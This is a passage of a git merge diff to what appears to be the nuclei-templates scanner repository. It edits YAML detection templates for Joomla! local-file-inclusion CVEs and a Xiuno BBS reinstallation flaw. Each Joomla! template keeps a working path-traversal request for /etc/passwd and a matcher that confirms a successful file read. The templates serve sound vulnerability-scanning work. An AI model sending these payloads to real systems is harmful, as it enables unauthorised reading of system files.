Merge branch 'master' of https://github.com/projectdiscovery/nuclei-templates into pr/3708

2022-02-15 11:43:16 +05:30 · 2022-02-15 11:43:16 +05:30 · 65f155f2e1
parent c3030e69ec 25938bc625
commit 65f155f2e1
44 changed files with 214 additions and 269 deletions
--- a/cnvd/2019/CNVD-2019-01348.yaml
+++ b/cnvd/2019/CNVD-2019-01348.yaml
@ -3,15 +3,15 @@ id: CNVD-2019-01348
 info:
  name: Xiuno BBS CNVD-2019-01348
  author: princechaddha
-  severity: medium
+  severity: high
-  description: Xiuno BBS system has a system reinstallation vulnerability that could allow an attacker to directly reinstall the system through the installation page.
+  description: The Xiuno BBS system has a system reinstallation vulnerability. The vulnerability stems from the failure to protect or filter the installation directory after the system is installed. Attackers can directly reinstall the system through the installation page.
  remediation: Upgrade to the latest version of Xiuno BBS or switch to a supported product.
  reference: https://www.cnvd.org.cn/flaw/show/CNVD-2019-01348
  tags: xiuno,cnvd,cnvd2019
  remediation: There is currently no patch available.
  classification:
-    cvss-metrics: CVSS:3.0/AV:A/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
+    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
-    cvss-score: 6.5
+    cvss-score: 7.5
-    cwe-id: CWE-276
+    cwe-id: CWE-284
 requests:
  - method: GET
--- a/cves/2010/CVE-2010-1219.yaml
+++ b/cves/2010/CVE-2010-1219.yaml
@ -3,24 +3,24 @@ info:
  name: Joomla! Component com_janews - Local File Inclusion
  author: daffainfo
  severity: high
-  description: Directory traversal vulnerability in the JA News (com_janews) component 1.0 for Joomla! allows remote attackers to read arbitrary local files via a .. (dot dot) in the controller parameter to index.php.
+  description: A directory traversal vulnerability in the JA News (com_janews) component 1.0 for Joomla! allows remote attackers to read arbitrary local files via a .. (dot dot) in the controller parameter to index.php.
  remediation: Upgrade to a supported version.
  reference:
    - https://www.exploit-db.com/exploits/11757
    - https://www.cvedetails.com/cve/CVE-2010-1219
  tags: cve,cve2010,joomla,lfi
-
+  classification:
    cve-id: CVE-2010-1219
 requests:
  - method: GET
    path:
      - "{{BaseURL}}/index.php?option=com_janews&controller=../../../../../../../../../../etc/passwd%00"
    matchers-condition: and
    matchers:
      - type: regex
        regex:
          - "root:.*:0:0"
      - type: status
        status:
          - 200
 # Enhanced by mp on 2022/02/14
--- a/cves/2010/CVE-2010-1302.yaml
+++ b/cves/2010/CVE-2010-1302.yaml
@ -1,27 +1,26 @@
 id: CVE-2010-1302
 info:
  name: Joomla! Component DW Graph - Local File Inclusion
  author: daffainfo
  severity: high
-  description: Directory traversal vulnerability in dwgraphs.php in the DecryptWeb DW Graphs (com_dwgraphs) component 1.0 for Joomla! allows remote attackers to read arbitrary files via directory traversal sequences in the controller parameter to index.php.
+  description: A directory traversal vulnerability in dwgraphs.php in the DecryptWeb DW Graphs (com_dwgraphs) component 1.0 for Joomla! allows remote attackers to read arbitrary files via directory traversal sequences in the controller parameter to index.php.
  remediation: Upgrade to a supported version.
  reference:
    - https://www.exploit-db.com/exploits/11978
    - https://www.cvedetails.com/cve/CVE-2010-1302
  tags: cve,cve2010,joomla,lfi,graph
-
+  classification:
    cve-id: CVE-2010-1302
 requests:
  - method: GET
    path:
      - "{{BaseURL}}/index.php?option=com_dwgraphs&controller=../../../../../../../../etc/passwd%00"
    matchers-condition: and
    matchers:
      - type: regex
        regex:
          - "root:.*:0:0"
      - type: status
        status:
          - 200
 # Enhanced by mp on 2022/02/14
--- a/cves/2010/CVE-2010-1304.yaml
+++ b/cves/2010/CVE-2010-1304.yaml
@ -1,27 +1,26 @@
 id: CVE-2010-1304
 info:
  name: Joomla! Component User Status - Local File Inclusion
  author: daffainfo
  severity: high
-  description: Directory traversal vulnerability in userstatus.php in the User Status (com_userstatus) component 1.21.16 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
+  description: A directory traversal vulnerability in userstatus.php in the User Status (com_userstatus) component 1.21.16 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
  remediation: Upgrade to a supported version.
  reference:
    - https://www.exploit-db.com/exploits/11998
    - https://www.cvedetails.com/cve/CVE-2010-1304
  tags: cve,cve2010,joomla,lfi,status
-
+  classification:
    cve-id: CVE-2010-1304
 requests:
  - method: GET
    path:
      - "{{BaseURL}}/index.php?option=com_userstatus&controller=../../../../../../../../../../etc/passwd%00"
    matchers-condition: and
    matchers:
      - type: regex
        regex:
          - "root:.*:0:0"
      - type: status
        status:
          - 200
 # Enhanced by mp on 2022/02/14
--- a/cves/2010/CVE-2010-1305.yaml
+++ b/cves/2010/CVE-2010-1305.yaml
@ -1,27 +1,26 @@
 id: CVE-2010-1305
 info:
  name: Joomla! Component JInventory 1.23.02 - Local File Inclusion
  author: daffainfo
  severity: high
-  description: Directory traversal vulnerability in jinventory.php in the JInventory (com_jinventory) component 1.23.02 and possibly other versions before 1.26.03, a module for Joomla!, allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
+  description: A directory traversal vulnerability in jinventory.php in the JInventory (com_jinventory) component 1.23.02 and possibly other versions before 1.26.03, a module for Joomla!, allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
  remediation: Upgrade to a supported version.
  reference:
    - https://www.exploit-db.com/exploits/12065
    - https://www.cvedetails.com/cve/CVE-2010-1305
  tags: cve,cve2010,joomla,lfi
-
+  classification:
    cve-id: CVE-2010-1305
 requests:
  - method: GET
    path:
      - "{{BaseURL}}/index.php?option=com_jinventory&controller=../../../../../../../../../../etc/passwd%00"
    matchers-condition: and
    matchers:
      - type: regex
        regex:
          - "root:.*:0:0"
      - type: status
        status:
          - 200
 # Enhanced by mp on 2022/02/14
--- a/cves/2010/CVE-2010-1306.yaml
+++ b/cves/2010/CVE-2010-1306.yaml
@ -1,27 +1,26 @@
 id: CVE-2010-1306
 info:
  name: Joomla! Component Picasa 2.0 - Local File Inclusion
  author: daffainfo
  severity: high
-  description: Directory traversal vulnerability in the Picasa (com_joomlapicasa2) component 2.0 and 2.0.5 for Joomla! allows remote attackers to read arbitrary local files via a .. (dot dot) in the controller parameter to index.php.
+  description: A directory traversal vulnerability in the Picasa (com_joomlapicasa2) component 2.0 and 2.0.5 for Joomla! allows remote attackers to read arbitrary local files via a .. (dot dot) in the controller parameter to index.php.
  remediation: Upgrade to a supported version.
  reference:
    - https://www.exploit-db.com/exploits/12058
    - https://www.cvedetails.com/cve/CVE-2010-1306
  tags: cve,cve2010,joomla,lfi
-
+  classification:
    cve-id: CVE-2010-1306
 requests:
  - method: GET
    path:
      - "{{BaseURL}}/index.php?option=com_joomlapicasa2&controller=../../../../../etc/passwd%00"
    matchers-condition: and
    matchers:
      - type: regex
        regex:
          - "root:.*:0:0"
      - type: status
        status:
          - 200
 # Enhanced by mp on 2022/02/14
--- a/cves/2010/CVE-2010-1307.yaml
+++ b/cves/2010/CVE-2010-1307.yaml
@ -1,27 +1,26 @@
 id: CVE-2010-1307
 info:
  name: Joomla! Component Magic Updater - Local File Inclusion
  author: daffainfo
  severity: high
-  description: Directory traversal vulnerability in the Magic Updater (com_joomlaupdater) component for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
+  description: A directory traversal vulnerability in the Magic Updater (com_joomlaupdater) component for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
  remediation: Upgrade to a supported version.
  reference:
    - https://www.exploit-db.com/exploits/12070
    - https://www.cvedetails.com/cve/CVE-2010-1307
  tags: cve,cve2010,joomla,lfi
-
+  classification:
    cve-id: CVE-2010-1307
 requests:
  - method: GET
    path:
      - "{{BaseURL}}/index.php?option=com_joomlaupdater&controller=../../../../../../../etc/passwd%00"
    matchers-condition: and
    matchers:
      - type: regex
        regex:
          - "root:.*:0:0"
      - type: status
        status:
          - 200
 # Enhanced by mp on 2022/02/14
--- a/cves/2010/CVE-2010-1308.yaml
+++ b/cves/2010/CVE-2010-1308.yaml
@ -1,27 +1,26 @@
 id: CVE-2010-1308
 info:
  name: Joomla! Component SVMap 1.1.1 - Local File Inclusion
  author: daffainfo
  severity: high
-  description: Directory traversal vulnerability in the SVMap (com_svmap) component 1.1.1 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
+  description: A directory traversal vulnerability in the SVMap (com_svmap) component 1.1.1 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
  remediation: Upgrade to a supported version.
  reference:
    - https://www.exploit-db.com/exploits/12066
    - https://www.cvedetails.com/cve/CVE-2010-1308
  tags: cve,cve2010,joomla,lfi
-
+  classification:
    cve-id: CVE-2010-1308
 requests:
  - method: GET
    path:
      - "{{BaseURL}}/index.php?option=com_svmap&controller=../../../../../../../etc/passwd%00"
    matchers-condition: and
    matchers:
      - type: regex
        regex:
          - "root:.*:0:0"
      - type: status
        status:
          - 200
 # Enhanced by mp on 2022/02/14
--- a/cves/2010/CVE-2010-1312.yaml
+++ b/cves/2010/CVE-2010-1312.yaml
@ -1,27 +1,26 @@
 id: CVE-2010-1312
 info:
  name: Joomla! Component News Portal 1.5.x - Local File Inclusion
  author: daffainfo
  severity: high
-  description: Directory traversal vulnerability in the iJoomla News Portal (com_news_portal) component 1.5.x for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
+  description: A directory traversal vulnerability in the iJoomla News Portal (com_news_portal) component 1.5.x for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
  remediation: Upgrade to a supported version.
  reference:
    - https://www.exploit-db.com/exploits/12077
    - https://www.cvedetails.com/cve/CVE-2010-1312
  tags: cve,cve2010,joomla,lfi
-
+  classification:
    cve-id: CVE-2010-1312
 requests:
  - method: GET
    path:
      - "{{BaseURL}}/index.php?option=com_news_portal&controller=../../../../../../../../../../etc/passwd%00"
    matchers-condition: and
    matchers:
      - type: regex
        regex:
          - "root:.*:0:0"
      - type: status
        status:
          - 200
 # Enhanced by mp on 2022/02/14
--- a/cves/2010/CVE-2010-1313.yaml
+++ b/cves/2010/CVE-2010-1313.yaml
@ -1,27 +1,26 @@
 id: CVE-2010-1313
 info:
  name: Joomla! Component Saber Cart 1.0.0.12 - Local File Inclusion
  author: daffainfo
  severity: high
-  description: Directory traversal vulnerability in the Seber Cart (com_sebercart) component 1.0.0.12 and 1.0.0.13 for Joomla!, when magic_quotes_gpc is disabled, allows remote attackers to read arbitrary files via a .. (dot dot) in the view parameter to index.php.
+  description: A directory traversal vulnerability in the Seber Cart (com_sebercart) component 1.0.0.12 and 1.0.0.13 for Joomla!, when magic_quotes_gpc is disabled, allows remote attackers to read arbitrary files via a .. (dot dot) in the view parameter to index.php.
  remediation: Upgrade to a supported version.
  reference:
    - https://www.exploit-db.com/exploits/12082
    - https://www.cvedetails.com/cve/CVE-2010-1313
  tags: cve,cve2010,joomla,lfi
-
+  classification:
    cve-id: CVE-2010-1313
 requests:
  - method: GET
    path:
      - "{{BaseURL}}/index.php?option=com_sebercart&view=../../../../../../../../../../etc/passwd%00"
    matchers-condition: and
    matchers:
      - type: regex
        regex:
          - "root:.*:0:0"
      - type: status
        status:
          - 200
 # Enhanced by mp on 2022/02/14
--- a/cves/2010/CVE-2010-1314.yaml
+++ b/cves/2010/CVE-2010-1314.yaml
@ -1,27 +1,26 @@
 id: CVE-2010-1314
 info:
  name: Joomla! Component Highslide 1.5 - Local File Inclusion
  author: daffainfo
  severity: high
-  description: Directory traversal vulnerability in the Highslide JS (com_hsconfig) component 1.5 and 2.0.9 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
+  description: A directory traversal vulnerability in the Highslide JS (com_hsconfig) component 1.5 and 2.0.9 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
  remediation: Upgrade to a supported version.
  reference:
    - https://www.exploit-db.com/exploits/12086
    - https://www.cvedetails.com/cve/CVE-2010-1314
  tags: cve,cve2010,joomla,lfi
-
+  classification:
    cve-id: CVE-2010-1314
 requests:
  - method: GET
    path:
      - "{{BaseURL}}/index.php?option=com_hsconfig&controller=../../../../../../../../../../etc/passwd%00"
    matchers-condition: and
    matchers:
      - type: regex
        regex:
          - "root:.*:0:0"
      - type: status
        status:
          - 200
 # Enhanced by mp on 2022/02/14
--- a/cves/2010/CVE-2010-1315.yaml
+++ b/cves/2010/CVE-2010-1315.yaml
@ -1,27 +1,26 @@
 id: CVE-2010-1315
 info:
  name: Joomla! Component webERPcustomer - Local File Inclusion
  author: daffainfo
  severity: high
-  description: Directory traversal vulnerability in weberpcustomer.php in the webERPcustomer (com_weberpcustomer) component 1.2.1 and 1.x before 1.06.02 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
+  description: A directory traversal vulnerability in weberpcustomer.php in the webERPcustomer (com_weberpcustomer) component 1.2.1 and 1.x before 1.06.02 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
  remediation: Upgrade to a supported version.
  reference:
    - https://www.exploit-db.com/exploits/11999
    - https://www.cvedetails.com/cve/CVE-2010-1315
  tags: cve,cve2010,joomla,lfi
-
+  classification:
    cve-id: CVE-2010-1315
 requests:
  - method: GET
    path:
      - "{{BaseURL}}/index.php?option=com_weberpcustomer&controller=../../../../../../../../../../etc/passwd%00"
    matchers-condition: and
    matchers:
      - type: regex
        regex:
          - "root:.*:0:0"
      - type: status
        status:
          - 200
 # Enhanced by mp on 2022/02/14
--- a/cves/2010/CVE-2010-1340.yaml
+++ b/cves/2010/CVE-2010-1340.yaml
@ -1,27 +1,26 @@
 id: CVE-2010-1340
 info:
  name: Joomla! Component com_jresearch - 'Controller' Local File Inclusion
  author: daffainfo
  severity: high
-  description: Directory traversal vulnerability in jresearch.php in the J!Research (com_jresearch) component for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
+  description: A directory traversal vulnerability in jresearch.php in the J!Research (com_jresearch) component for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
  remediation: Upgrade to a supported version.
  reference:
    - https://www.exploit-db.com/exploits/33797
    - https://www.cvedetails.com/cve/CVE-2010-1340
  tags: cve,cve2010,joomla,lfi
-
+  classification:
    cve-id: CVE-2010-1340
 requests:
  - method: GET
    path:
      - "{{BaseURL}}/index.php?option=com_jresearch&controller=../../../../../../../../etc/passwd%00"
    matchers-condition: and
    matchers:
      - type: regex
        regex:
          - "root:.*:0:0"
      - type: status
        status:
          - 200
 # Enhanced by mp on 2022/02/14
--- a/cves/2010/CVE-2010-1345.yaml
+++ b/cves/2010/CVE-2010-1345.yaml
@ -1,27 +1,26 @@
 id: CVE-2010-1345
 info:
  name: Joomla! Component Cookex Agency CKForms - Local File Inclusion
  author: daffainfo
  severity: high
-  description: Directory traversal vulnerability in the Cookex Agency CKForms (com_ckforms) component 1.3.3 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
+  description: A directory traversal vulnerability in the Cookex Agency CKForms (com_ckforms) component 1.3.3 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
  remediation: Upgrade to a supported version.
  reference:
    - https://www.exploit-db.com/exploits/15453
    - https://www.cvedetails.com/cve/CVE-2010-1345
  tags: cve,cve2010,joomla,lfi
-
+  classification:
    cve-id: CVE-2010-1345
 requests:
  - method: GET
    path:
      - "{{BaseURL}}/index.php?option=com_ckforms&controller=../../../../../../../../../../etc/passwd%00"
    matchers-condition: and
    matchers:
      - type: regex
        regex:
          - "root:.*:0:0"
      - type: status
        status:
          - 200
 # Enhanced by mp on 2022/02/14
--- a/cves/2010/CVE-2010-1352.yaml
+++ b/cves/2010/CVE-2010-1352.yaml
@ -1,27 +1,26 @@
 id: CVE-2010-1352
 info:
  name: Joomla! Component Juke Box 1.7 - Local File Inclusion
  author: daffainfo
  severity: high
-  description: Directory traversal vulnerability in the JOOFORGE Jutebox (com_jukebox) component 1.0 and 1.7 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
+  description: A directory traversal vulnerability in the JOOFORGE Jutebox (com_jukebox) component 1.0 and 1.7 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
  remediation: Upgrade to a supported version.
  reference:
    - https://www.exploit-db.com/exploits/12084
    - https://www.cvedetails.com/cve/CVE-2010-1352
  tags: cve,cve2010,joomla,lfi
-
+  classification:
    cve-id: CVE-2010-1352
 requests:
  - method: GET
    path:
      - "{{BaseURL}}/index.php?option=com_jukebox&controller=../../../../../../../../../../etc/passwd%00"
    matchers-condition: and
    matchers:
      - type: regex
        regex:
          - "root:.*:0:0"
      - type: status
        status:
          - 200
 # Enhanced by mp on 2022/02/14
--- a/cves/2010/CVE-2010-1353.yaml
+++ b/cves/2010/CVE-2010-1353.yaml
@ -1,27 +1,26 @@
 id: CVE-2010-1353
 info:
  name: Joomla! Component LoginBox - Local File Inclusion
  author: daffainfo
  severity: high
-  description: Directory traversal vulnerability in the LoginBox Pro (com_loginbox) component for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the view parameter to index.php.
+  description: A directory traversal vulnerability in the LoginBox Pro (com_loginbox) component for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the view parameter to index.php.
  remediation: Upgrade to a supported version.
  reference:
    - https://www.exploit-db.com/exploits/12068
    - https://www.cvedetails.com/cve/CVE-2010-1353
  tags: cve,cve2010,joomla,lfi
-
+  classification:
    cve-id: CVE-2010-1353
 requests:
  - method: GET
    path:
      - "{{BaseURL}}/index.php?option=com_loginbox&view=../../../../../../../../../etc/passwd%00"
    matchers-condition: and
    matchers:
      - type: regex
        regex:
          - "root:.*:0:0"
      - type: status
        status:
          - 200
 # Enhanced by mp on 2022/02/14
--- a/cves/2010/CVE-2010-1354.yaml
+++ b/cves/2010/CVE-2010-1354.yaml
@ -4,24 +4,25 @@ info:
  name: Joomla! Component VJDEO 1.0 - Local File Inclusion
  author: daffainfo
  severity: high
-  description: Directory traversal vulnerability in the VJDEO (com_vjdeo) component 1.0 and 1.0.1 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
+  description: A directory traversal vulnerability in the VJDEO (com_vjdeo) component 1.0 and 1.0.1 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
  remediation: Upgrade to a supported version.
  reference:
    - https://www.exploit-db.com/exploits/12102
    - https://www.cvedetails.com/cve/CVE-2010-1354
  tags: cve,cve2010,joomla,lfi
  classification:
    cve-id: CVE-2010-1354
 requests:
  - method: GET
    path:
      - "{{BaseURL}}/index.php?option=com_vjdeo&controller=../../../../../../../../../../../../../../../etc/passwd%00"
    matchers-condition: and
    matchers:
      - type: regex
        regex:
          - "root:.*:0:0"
      - type: status
        status:
          - 200
 # Enhanced by mp on 2022/02/14
--- a/cves/2010/CVE-2010-1461.yaml
+++ b/cves/2010/CVE-2010-1461.yaml
@ -4,24 +4,25 @@ info:
  name: Joomla! Component Photo Battle 1.0.1 - Local File Inclusion
  author: daffainfo
  severity: high
-  description: Directory traversal vulnerability in the Photo Battle (com_photobattle) component 1.0.1 for Joomla! allows remote attackers to read arbitrary files via the view parameter to index.php.
+  description: A directory traversal vulnerability in the Photo Battle (com_photobattle) component 1.0.1 for Joomla! allows remote attackers to read arbitrary files via the view parameter to index.php.
  remediation: Upgrade to a supported version.
  reference: |
    - https://www.exploit-db.com/exploits/12232
    - https://www.cvedetails.com/cve/CVE-2010-1461
  tags: cve,cve2010,joomla,lfi,photo
  classification:
    cve-id: CVE-2010-1461
 requests:
  - method: GET
    path:
      - "{{BaseURL}}/index.php?option=com_photobattle&view=../../../../../../../../../../etc/passwd%00"
    matchers-condition: and
    matchers:
      - type: regex
        regex:
          - "root:.*:0:0"
      - type: status
        status:
          - 200
 # Enhanced by mp on 2022/02/14
--- a/cves/2010/CVE-2010-1469.yaml
+++ b/cves/2010/CVE-2010-1469.yaml
@ -4,24 +4,25 @@ info:
  name: Joomla! Component JProject Manager 1.0 - Local File Inclusion
  author: daffainfo
  severity: high
-  description: Directory traversal vulnerability in the Ternaria Informatica JProject Manager (com_jprojectmanager) component 1.0 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impact via a .. (dot dot) in the controller parameter to index.php.
+  description: A directory traversal vulnerability in the Ternaria Informatica JProject Manager (com_jprojectmanager) component 1.0 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impact via a .. (dot dot) in the controller parameter to index.php.
  remediation: Upgrade to a supported version.
  reference: |
    - https://www.exploit-db.com/exploits/12146
    - https://www.cvedetails.com/cve/CVE-2010-1469
  tags: cve,cve2010,joomla,lfi
  classification:
    cve-id: CVE-2010-1469
 requests:
  - method: GET
    path:
      - "{{BaseURL}}/index.php?option=com_jprojectmanager&controller=../../../../../../../../../../etc/passwd%00"
    matchers-condition: and
    matchers:
      - type: regex
        regex:
          - "root:.*:0:0"
      - type: status
        status:
          - 200
 # Enhanced by mp on 2022/02/14
--- a/cves/2010/CVE-2010-1470.yaml
+++ b/cves/2010/CVE-2010-1470.yaml
@ -4,24 +4,25 @@ info:
  name: Joomla! Component Web TV 1.0 - Local File Inclusion
  author: daffainfo
  severity: high
-  description: Directory traversal vulnerability in the Web TV (com_webtv) component 1.0 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impact via a .. (dot dot) in the controller parameter to index.php.
+  description: A directory traversal vulnerability in the Web TV (com_webtv) component 1.0 for Joomla! allows remote attackers to read arbitrary files and have possibly other unspecified impacts via a .. (dot dot) in the controller parameter to index.php.
  remediation: Upgrade to a supported version.
  reference:
    - https://www.exploit-db.com/exploits/12166
    - https://www.cvedetails.com/cve/CVE-2010-1470
  tags: cve,cve2010,joomla,lfi
  classification:
    cve-id: CVE-2010-1470
 requests:
  - method: GET
    path:
      - "{{BaseURL}}/index.php?option=com_webtv&controller=../../../../../../../../../../etc/passwd%00"
    matchers-condition: and
    matchers:
      - type: regex
        regex:
          - "root:.*:0:0"
      - type: status
        status:
          - 200
 # Enhanced by mp on 2022/02/14
--- a/cves/2010/CVE-2010-1471.yaml
+++ b/cves/2010/CVE-2010-1471.yaml
@ -4,24 +4,25 @@ info:
  name: Joomla! Component Address Book 1.5.0 - Local File Inclusion
  author: daffainfo
  severity: high
-  description: Directory traversal vulnerability in the AddressBook (com_addressbook) component 1.5.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
+  description: A directory traversal vulnerability in the AddressBook (com_addressbook) component 1.5.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
  remediation: Upgrade to a supported version.
  reference:
    - https://www.exploit-db.com/exploits/12170
    - https://www.cvedetails.com/cve/CVE-2010-1471
  tags: cve,cve2010,joomla,lfi
  classification:
    cve-id: CVE-2010-1471
 requests:
  - method: GET
    path:
      - "{{BaseURL}}/index.php?option=com_addressbook&controller=../../../../../../../../../../etc/passwd%00"
    matchers-condition: and
    matchers:
      - type: regex
        regex:
          - "root:.*:0:0"
      - type: status
        status:
          - 200
 # Enhanced by mp on 2022/02/14
--- a/cves/2010/CVE-2010-1472.yaml
+++ b/cves/2010/CVE-2010-1472.yaml
@ -4,24 +4,25 @@ info:
  name: Joomla! Component Horoscope 1.5.0 - Local File Inclusion
  author: daffainfo
  severity: high
-  description: Directory traversal vulnerability in the Daily Horoscope (com_horoscope) component 1.5.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
+  description: A directory traversal vulnerability in the Daily Horoscope (com_horoscope) component 1.5.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
  remediation: Upgrade to a supported version.
  reference:
    - https://www.exploit-db.com/exploits/12167
    - https://www.cvedetails.com/cve/CVE-2010-1472
  tags: cve,cve2010,joomla,lfi
  classification:
    cve-id: CVE-2010-1472
 requests:
  - method: GET
    path:
      - "{{BaseURL}}/index.php?option=com_horoscope&controller=../../../../../../../../../../etc/passwd%00"
    matchers-condition: and
    matchers:
      - type: regex
        regex:
          - "root:.*:0:0"
      - type: status
        status:
          - 200
 # Enhanced by mp on 2022/02/14
--- a/cves/2010/CVE-2010-1473.yaml
+++ b/cves/2010/CVE-2010-1473.yaml
@ -4,24 +4,25 @@ info:
  name: Joomla! Component Advertising 0.25 - Local File Inclusion
  author: daffainfo
  severity: high
-  description: Directory traversal vulnerability in the Advertising (com_advertising) component 0.25 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impact via a .. (dot dot) in the controller parameter to index.php.
+  description: A directory traversal vulnerability in the Advertising (com_advertising) component 0.25 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php.
  remediation: Upgrade to a supported version.
  reference:
    - https://www.exploit-db.com/exploits/12171
    - https://www.cvedetails.com/cve/CVE-2010-1473
  tags: cve,cve2010,joomla,lfi
  classification:
    cve-id: CVE-2010-1473
 requests:
  - method: GET
    path:
      - "{{BaseURL}}/index.php?option=com_advertising&controller=../../../../../../../../../../etc/passwd%00"
    matchers-condition: and
    matchers:
      - type: regex
        regex:
          - "root:.*:0:0"
      - type: status
        status:
          - 200
 # Enhanced by mp on 2022/02/14
--- a/cves/2010/CVE-2010-1474.yaml
+++ b/cves/2010/CVE-2010-1474.yaml
@ -4,24 +4,25 @@ info:
  name: Joomla! Component Sweetykeeper 1.5 - Local File Inclusion
  author: daffainfo
  severity: high
-  description: Directory traversal vulnerability in the Sweety Keeper (com_sweetykeeper) component 1.5.x for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impact via a .. (dot dot) in the controller parameter to index.php.
+  description: A directory traversal vulnerability in the Sweety Keeper (com_sweetykeeper) component 1.5.x for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php.
  remediation: Upgrade to a supported version.
  reference:
    - https://www.exploit-db.com/exploits/12182
    - https://www.cvedetails.com/cve/CVE-2010-1474
  tags: cve,cve2010,joomla,lfi
  classification:
    cve-id: CVE-2010-1474
 requests:
  - method: GET
    path:
      - "{{BaseURL}}/index.php?option=com_sweetykeeper&controller=../../../../../../../../../../etc/passwd%00"
    matchers-condition: and
    matchers:
      - type: regex
        regex:
          - "root:.*:0:0"
      - type: status
        status:
          - 200
 # Enhanced by mp on 2022/02/14
--- a/cves/2010/CVE-2010-1475.yaml
+++ b/cves/2010/CVE-2010-1475.yaml
@ -4,24 +4,25 @@ info:
  name: Joomla! Component Preventive And Reservation 1.0.5 - Local File Inclusion
  author: daffainfo
  severity: high
-  description: Directory traversal vulnerability in the Preventive & Reservation (com_preventive) component 1.0.5 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impact via a .. (dot dot) in the controller parameter to index.php.
+  description: A directory traversal vulnerability in the Preventive & Reservation (com_preventive) component 1.0.5 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php.
  remediation: Upgrade to a supported version.
  reference:
    - https://www.exploit-db.com/exploits/12147
    - https://www.cvedetails.com/cve/CVE-2010-1475
  tags: cve,cve2010,joomla,lfi
  classification:
    cve-id: CVE-2010-1475
 requests:
  - method: GET
    path:
      - "{{BaseURL}}/index.php?option=com_preventive&controller==../../../../../../../../../../etc/passwd%00"
    matchers-condition: and
    matchers:
      - type: regex
        regex:
          - "root:.*:0:0"
      - type: status
        status:
          - 200
 # Enhanced by mp on 2022/02/14
--- a/cves/2010/CVE-2010-1476.yaml
+++ b/cves/2010/CVE-2010-1476.yaml
@ -4,24 +4,25 @@ info:
  name: Joomla! Component AlphaUserPoints 1.5.5 - Local File Inclusion
  author: daffainfo
  severity: high
-  description: Directory traversal vulnerability in the AlphaUserPoints (com_alphauserpoints) component 1.5.5 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impact via a .. (dot dot) in the view parameter to index.php.
+  description: A directory traversal vulnerability in the AlphaUserPoints (com_alphauserpoints) component 1.5.5 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the view parameter to index.php.
  remediation: Upgrade to a supported version.
  reference:
    - https://www.exploit-db.com/exploits/12150
    - https://www.cvedetails.com/cve/CVE-2010-1476
  tags: cve,cve2010,joomla,lfi
  classification:
    cve-id: CVE-2010-1476
 requests:
  - method: GET
    path:
      - "{{BaseURL}}/index.php?option=com_alphauserpoints&view=../../../../../../../../../../etc/passwd%00"
    matchers-condition: and
    matchers:
      - type: regex
        regex:
          - "root:.*:0:0"
      - type: status
        status:
          - 200
 # Enhanced by mp on 2022/02/14
--- a/cves/2010/CVE-2010-1478.yaml
+++ b/cves/2010/CVE-2010-1478.yaml
@ -4,24 +4,26 @@ info:
  name: Joomla! Component Jfeedback 1.2 - Local File Inclusion
  author: daffainfo
  severity: high
-  description: Directory traversal vulnerability in the Ternaria Informatica Jfeedback! (com_jfeedback) component 1.2 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impact via a .. (dot dot) in the controller parameter to index.php.
+  description: A directory traversal vulnerability in the Ternaria Informatica Jfeedback! (com_jfeedback) component 1.2 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php.
  remediation: Upgrade to a supported version.
  reference: |
    - https://www.exploit-db.com/exploits/12145
    - https://www.cvedetails.com/cve/CVE-2010-1478
  tags: cve,cve2010,joomla,lfi
  classification:
    cve-id: CVE-2010-1478
 requests:
  - method: GET
    path:
